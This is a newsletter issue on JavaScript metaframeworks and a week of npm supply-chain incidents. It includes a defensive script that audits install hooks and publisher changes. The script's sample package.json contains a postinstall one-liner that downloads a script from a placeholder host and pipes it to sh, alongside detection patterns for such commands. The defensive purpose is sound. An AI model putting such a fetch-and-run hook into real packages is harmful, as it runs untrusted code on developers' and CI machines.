Issue #26: Attack


🎵 Your promises, they look like lies; your honesty, like a back that hides a knife… 🎵

This week wasn’t too rich in JavaScript tooling news or metaframework updates, but it was quite rich in bad news from the supply-chain side of the projects we all build with these (and other) tools. Of course, it’s not all dark and sad, and hopefully we’ll finish on a positive note, but as usual, even bad news brings at least one good outcome: experience.

The Good

Jono Alderson wrote a piece of developer wisdom, full of contentious opinions but also of a lot of experience and insight, on building for the Web with SPAs and MPAs, called “It’s time for modern CSS to kill the SPA”. And even though metaframeworks are the direct antiheroes of this blog post, indirectly they are (as often) the answer, given how many MPA capabilities they provide out of the box. Of course, the author was talking about tech such as WordPress and the like, but that is not always the best choice, and many seasoned professional developers have chosen metaframeworks and metaframework-like tools instead, as they can be much lighter, slicker, more minimalist, and easier to maintain. With that, the ideas the article puts forward make total sense, even though it simplifies a little and assumes the SPA approach is useless. But in the end, both opponents and supporters of the metaframework idea can agree on one thing:

Use React if you want. Use Tailwind, Vite, whatever. Just don’t ship it all to the browser unless you need to.

The Bad

But performance and sanity are not the only ideas that unite web developers of all kinds. There is also the inevitable common adversary: dependencies.

Well, yes, it sounds lame, but while dependencies are practically unavoidable in software development, especially in the JavaScript ecosystem, they also bring a lot of danger. The more things you depend on, the more risk you factor into your day-to-day work: every transitive package is code that lands on your machine and in CI, and any install script it ships runs before you have looked at it.

For me personally, the problems started out of the blue with a CI/CD failure that came with a team member’s PR one beautiful day. Together with hundreds of thousands of developers (I assume), we discovered that npm had accidentally removed the stylus package from its global registry. I was surprised, taking into account that the last thing I built with Stylus was probably this cutie from ages ago, but we figured that as both Webpack and Vite depend on Stylus, it’s actually a big deal for almost everyone who builds for the web.

Panya, one of the maintainers of the stylus package, published several malicious packages; because of that, his account was banned, and all the packages connected to him were yanked, including stylus itself. So that’s the story here.

As of today, the package has fortunately been restored, making all the downstream consumers happy. Interestingly,

This incident marks the first notable instance of a registry taking down an entire legitimate project in what appears to be an administrative error.

But unfortunately, it was not the last npm problem of the week. Again impacting a lot of developers who use npm as a foundation, several packages shipped malicious versions, including such hits as is (which you didn’t use, of course, right? Right?!) and eslint-plugin-prettier. If either one is in your lockfile, even transitively, you used it. There are lots of insights in the article and the sources it references, but all in all, it never hurts to repeat that:

Developers working with open source packages should:

  • Monitor repository visibility changes in search of suspicious or unusual publishing of packages
  • Review package.json lifecycle scripts before installing dependencies
  • Use automated security scanning in continuous integration and continuous delivery pipelines
  • Regularly rotate authentication tokens
  • Use multifactor authentication to safeguard repository accounts
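Two of those bullets, checking lifecycle scripts and watching for unusual publishing, can be turned into a pre-install gate. Below is an added example for this issue, not code from the newsletter, from npm, or from any of the projects mentioned. It assumes the packument shape served by registry.npmjs.org (`time[version]` holds the publish timestamp, `versions[version]._npmUser.name` the publishing account); the package name `example-lib`, the account names, the URL `example.invalid`, and all sample data are constructed for illustration.

```javascript
// Added example (not from the original post or from npm): audit a dependency
// before `npm install` runs it. Sample package.json and registry metadata below
// are constructed for illustration only.

// Hooks npm runs automatically during install. `prepare` additionally runs for
// git dependencies; the first three run for every dependency that declares them.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Patterns that are rarely legitimate in an install hook: fetching and piping
// to a shell, inline node/powershell one-liners, encoded payloads.
const SUSPICIOUS_PATTERNS = [
  /\b(curl|wget)\b/i,
  /\|\s*(sh|bash)\b/,
  /\bnode\s+-e\b/,
  /\beval\s*\(/,
  /\bbase64\b/i,
  /\bpowershell\b/i,
];

// Return the lifecycle hooks a package would run on install: [{ hook, command }].
function findLifecycleScripts(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return LIFECYCLE_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => ({ hook, command: scripts[hook] }));
}

function isSuspiciousCommand(command) {
  return SUSPICIOUS_PATTERNS.some((re) => re.test(command));
}

// Walk the packument in publish order and flag any version published by an
// account that had not published this package before (assumed packument shape:
// `time[version]` = ISO timestamp, `versions[version]._npmUser.name` = account).
function findUnfamiliarPublishers(packument) {
  const versions = packument.versions || {};
  const time = packument.time || {};
  const ordered = Object.keys(versions).sort(
    (a, b) => Date.parse(time[a]) - Date.parse(time[b]),
  );
  const seen = new Set();
  const flagged = [];
  for (const version of ordered) {
    const publisher = versions[version]._npmUser && versions[version]._npmUser.name;
    if (!publisher) continue;
    if (seen.size > 0 && !seen.has(publisher)) {
      flagged.push({ version, publisher, publishedAt: time[version] });
    }
    seen.add(publisher);
  }
  return flagged;
}

// Combine both checks into one report. `blockInstall` is true when an install
// hook looks suspicious or the version being installed came from a new account.
function auditPackage(pkg, packument) {
  const lifecycle = findLifecycleScripts(pkg);
  const suspiciousHooks = lifecycle
    .filter(({ command }) => isSuspiciousCommand(command))
    .map(({ hook }) => hook);
  const unfamiliarPublishers = findUnfamiliarPublishers(packument);
  const thisVersionFromNewAccount = unfamiliarPublishers.some(
    (f) => f.version === pkg.version,
  );
  return {
    name: pkg.name,
    version: pkg.version,
    lifecycle,
    suspiciousHooks,
    unfamiliarPublishers,
    blockInstall: suspiciousHooks.length > 0 || thisVersionFromNewAccount,
  };
}

// Constructed sample: a version whose postinstall fetches and runs a remote script.
const SAMPLE_PACKAGE_JSON = {
  name: 'example-lib',
  version: '1.0.2',
  scripts: {
    test: 'node test.js',
    postinstall: 'node -e "require(\'child_process\').execSync(\'curl -s https://example.invalid/p | sh\')"',
  },
};

// Constructed sample packument: the newest version was published by a new account.
const SAMPLE_PACKUMENT = {
  name: 'example-lib',
  time: {
    '1.0.0': '2024-01-10T00:00:00.000Z',
    '1.0.1': '2024-06-01T00:00:00.000Z',
    '1.0.2': '2025-07-18T09:15:00.000Z',
  },
  versions: {
    '1.0.0': { _npmUser: { name: 'long-time-maintainer' } },
    '1.0.1': { _npmUser: { name: 'long-time-maintainer' } },
    '1.0.2': { _npmUser: { name: 'never-seen-before' } },
  },
};

console.log(JSON.stringify(auditPackage(SAMPLE_PACKAGE_JSON, SAMPLE_PACKUMENT), null, 2));
```

Run it with Node; for a real package, feed it the package’s package.json and the full packument from `https://registry.npmjs.org/<name>`. Treat `blockInstall` as a review gate rather than a verdict: native modules legitimately use install hooks, and a phished maintainer token publishes under the usual, familiar account, so the publisher check alone would not catch that case while the hook review still can. To stop hooks from running before you have looked at them, install with `npm install --ignore-scripts` (or put `ignore-scripts=true` in `.npmrc`) and run the ones you actually need afterwards with `npm rebuild`.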

The Noteworthy

I love that I have this “Noteworthy” section to ease the anxiety caused by the previous one. And this time we have something to celebrate again!

No matter how much you like or dislike Mozilla and the things they build, if you started your career even a little before the ChatGPT era, you can’t help knowing (and loving, if you’re me) MDN. Unarguably the best resource for learning web development in tech history celebrates its 20th birthday this July. I can’t help wishing this project another 20 years ahead, no matter what route the knowledge-sharing world takes in the future. I personally keep such tools in my heart no matter what.

Another piece of news that brought joy to the hearts of people who still believe in open source tools was the new release of RedwoodGraphQL, which had seemingly been left behind recently in favour of RedwoodSDK. It’s always good to have choices, and to have projects of love surviving big environmental upheavals.

And to make this newsletter project survive potential upheavals too, I made some updates and fixes to enable proper RSS functionality for it. Now, thanks to the awesome Astro docs, which helped a lot in making it happen, you can use the RSS reader of your choice to get the latest and greatest from the Metaframeworks Weekly (either by dropping this website’s link in directly, or by using the classic RSS XML link).

With that reference in hand, I again call on you to keep as few dependencies as possible in your life and work, and to build both in a responsible and aware way. But still, if some npm package (or some newsletter) makes your life easier, nurture your relationship with it and don’t forget to drop it an occasional visit. They value that a lot.

👋

Found it useful? Consider subscribing. No hidden catch, no strings attached.